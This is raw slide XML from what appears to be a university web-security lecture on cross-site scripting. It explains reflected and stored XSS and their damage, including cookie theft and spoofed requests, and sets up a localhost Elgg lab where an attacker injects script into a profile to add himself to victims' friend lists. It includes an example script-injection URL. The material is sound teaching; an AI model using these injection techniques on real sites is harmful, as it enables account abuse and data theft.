        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4788000"/>
            <a:ext cx="8409300" cy="35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https://www.ntu.edu.sg/home/ehchua/programming/webprogramming/HTTP_Basics.html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Types of XSS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="2061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rPr>
              <a:t>Non-persistent (Reflected) XSS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent (Stored) XSS Attack</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Non-persistent (Reflected) XSS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="515" name="Google Shape;515;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="399300" y="1452666"/>
            <a:ext cx="4485675" cy="2737700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4884975" y="1452666"/>
            <a:ext cx="4054800" cy="253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If a website with a reflective behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>means: </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>The user input will be reflected back in the response. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>If no proper input validation (sanitization) is done, malicious input can be inject and reflected back.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>To attack, we need to have injected malicious code executed in the victim’s enviroment.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Google Shape;517;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529225" y="1633800"/>
            <a:ext cx="2881500" cy="1351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8" name="Google Shape;518;p87"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2259912" y="3322441"/>
            <a:ext cx="1386000" cy="426900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999000" y="3616425"/>
            <a:ext cx="264600" cy="132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520" name="Google Shape;520;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526425" y="2985000"/>
            <a:ext cx="494400" cy="977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Non-persistent (Reflected) XSS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;526;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="399300" y="1452666"/>
            <a:ext cx="4485675" cy="2737700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Google Shape;527;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4884975" y="1452666"/>
            <a:ext cx="4054800" cy="253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If a website with a reflective behavior takes user inputs, then :</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Attackers can put JavaScript code in the input, so when the input is reflected back, the JavaScript code will be injected into the web page from the website.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Non-persistent (Reflected) XSS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p8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rPr>
              <a:t>Assume a vulnerable service on website : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.exame.com/search?input=word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where word is provided by the users.</a:t>
            </a:r>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rPr>
              <a:t>Now the attacker sends the following URL to the victim and tricks him to click the link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.example.com/search?input=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“attack”);&lt;/script&gt;</a:t>
            </a:r>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rPr>
              <a:t>Once the victim clicks on this link, an HTTP GET request will be sent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> web server, which returns a page containing the search result, with the original input in the page. The input here is a JavaScript code which runs and gives a pop-up message on the victim’s browser.</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Persistent (Stored) XSS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5035775" y="1152475"/>
            <a:ext cx="3796800" cy="3919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rPr>
              <a:t>Attackers directly send their data to a target website/server which stores the data in a persistent storage.</a:t>
            </a:r>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rPr>
              <a:t>If the website later sends the stored data to other users, it creates a channel between the users and the attackers.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example : User profile in a social network is a channel as it is set by one user and viewed by another.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="540" name="Google Shape;540;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392475" y="1152475"/>
            <a:ext cx="4562525" cy="27703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Persistent (Stored) XSS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p9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rPr>
              <a:t>These channels are supposed to be data channels. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But data provided by users can contain HTML markups and JavaScript code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the input is not sanitized properly by the website, it is sent to other users’ browsers through the channel and gets executed by the browsers.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browsers consider it like any other code coming from the website. Therefore, the code is given the same privileges as that from the website. (Same origin principle)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Damage Caused by XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p9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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web defacing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> JavaScript code can use DOM APIs to access the DOM nodes inside the hosting page. Therefore, the injected JavaScript code can make arbitrary changes to the page. Example: JavaScript code can change a news article page to something fake or change some pictures on the page.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The injected JavaScript code can send HTTP requests to the server on behalf of the user. (Discussed in later slides)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing information: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The injected JavaScript code can also steal victim’s private data including the session cookies, personal data displayed on the web page, data stored locally by the web application.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Environment Setup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1715012"/>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rial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elgg: open-source web application for social networking with disabled countermeasures for XSS.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elgg website : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xsslabelgg.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The website is hosted on localhost via Apache’s Virtual Hosting</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="559" name="Google Shape;559;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="879496" y="3002237"/>
            <a:ext cx="7421125" cy="11103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Attack Surfaces for XSS attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565;p9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rPr>
              <a:t>To launch an attack, we need to find places where we can inject JavaScript code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These input fields are potential attack surfaces wherein attackers can put JavaScript code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the web application doesn’t remove the code, the code can be triggered on the browser and cause damage.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our task, we will insert our code in the “Brief Description” field, so that when Alice views Samy’s profile, the code gets executed with a simple message.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XSS Attacks to Befriend with Others</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1067784"/>
            <a:ext cx="7884900" cy="386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0000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Add Samy to other people’s friend list without their consent.</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Investigation taken by attacker Samy:</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="18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Samy clicks “add-friend” button from Charlie’s account (discussed in CSRF) to add himself to Charlie’s friend list.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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Using Firefox’s LiveHTTPHeader extension, he captures the add-friend request.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3"/>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Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p33"/>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Confidentiality: no</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Integrity: no</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authentication: challenge-response mechanisms, e.g.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Basic access authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Digest access authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Not really useful </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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XSS Attacks to Befriend with Others</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="577" name="Google Shape;577;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412825" y="1144100"/>
            <a:ext cx="5945151" cy="2315275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Google Shape;578;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6449797" y="1043239"/>
            <a:ext cx="2552100" cy="361753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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
